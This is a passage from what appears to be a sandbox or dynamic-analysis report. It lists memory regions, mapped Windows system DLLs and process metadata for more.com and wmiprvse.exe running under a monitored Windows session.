name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2470
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2471
start_va = 0xff8e0000
end_va = 0xff8e9fff
monitored = 0
entry_point = 0xff8e409c
region_type = mapped_file
name = "more.com"
filename = "\\Windows\\System32\\more.com" (normalized: "c:\\windows\\system32\\more.com")
Region:
id = 2472
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2473
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2474
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2475
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2476
start_va = 0x1b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2477
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2478
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2479
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2480
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2481
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2482
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2483
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2484
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2485
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2486
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2487
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2488
start_va = 0x7fef78c0000
end_va = 0x7fef78e7fff
monitored = 0
entry_point = 0x7fef78c1408
region_type = mapped_file
name = "ulib.dll"
filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll")
Region:
id = 2489
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2490
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2491
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2492
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2493
start_va = 0xc0000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2494
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2495
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 2504
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2505
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2506
start_va = 0x120000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2507
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2508
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2509
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2510
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 2511
start_va = 0x6d0000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 2512
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2513
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2520
start_va = 0xe0000
end_va = 0x117fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ulib.dll.mui"
filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui")
Thread:
id = 118
os_tid = 0xd4c
Process:
id = "21"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x4f698000"
os_pid = "0xcb4"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "5"
os_parent_pid = "0x254"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000735c4" [0xc000000f]
Region:
id = 2613
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2614
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2615
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2616
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2617
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2618
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 2619
start_va = 0x70000
end_va = 0x74fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 2620
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 2621
start_va = 0x90000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2622
start_va = 0x110000
end_va = 0x110fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 2623
start_va = 0x120000
end_va = 0x21ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2624
start_va = 0x220000
end_va = 0x286fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2625
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2626
start_va = 0x390000
end_va = 0x517fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 2627
start_va = 0x520000
end_va = 0x6a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 2628
start_va = 0x6b0000
end_va = 0x76ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 2629
start_va = 0x770000
end_va = 0xa3efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2630
start_va = 0xa40000
end_va = 0xa40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a40000"
filename = ""
Region:
id = 2631
start_va = 0xa50000
end_va = 0xa5cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2632
start_va = 0xa80000
end_va = 0xa82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 2633
start_va = 0xbe0000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 2634
start_va = 0xcf0000
end_va = 0xd6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2635
start_va = 0xe70000
end_va = 0xeeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 2636
start_va = 0xf00000
end_va = 0xf7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 2637
start_va = 0x1030000
end_va = 0x10affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001030000"
filename = ""
Region:
id = 2638
start_va = 0x10b0000
end_va = 0x11affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2639
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 2640
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2641
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2642
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2643
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2644
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2645
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2646
start_va = 0x13fef0000
end_va = 0x13ff5bfff
monitored = 0
entry_point = 0x13ff2b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 2647
start_va = 0x7fef2410000
end_va = 0x7fef2609fff
monitored = 1
entry_point = 0x7fef2424c9c
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 2648
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 2649
start_va = 0x7fef9690000
end_va = 0x7fef96a1fff
monitored = 0
entry_point = 0x7fef96989d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 2650
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 2651
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2652
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2653
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2654
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 1
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2655
start_va = 0x7fefb130000
end_va = 0x7fefb13efff
monitored = 0
entry_point = 0x7fefb131040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 2656
start_va = 0x7fefb770000
end_va = 0x7fefb79bfff
monitored = 0
entry_point = 0x7fefb7715c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2657
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2658
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2659
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2660
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2661
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 2662
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2663
start_va = 0x7fefce50000
end_va = 0x7fefcea6fff
monitored = 0
entry_point = 0x7fefce55e38
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 2664
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2665
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2666
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2667
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2668
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2669
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2670
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2671
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2672
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2673
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2674
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 2675
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2676
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2677
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2678
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2679
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2680
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2681
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2682
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2683
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2684
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2685
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2686
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2687
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2688
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2689
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2690
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2691
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2692
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2693
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 2694
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2695
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2696
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2697
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2698
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2699
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2700
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2701
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2702
start_va = 0xa60000
end_va = 0xa65fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2703
start_va = 0xb10000
end_va = 0xb8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 2704
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
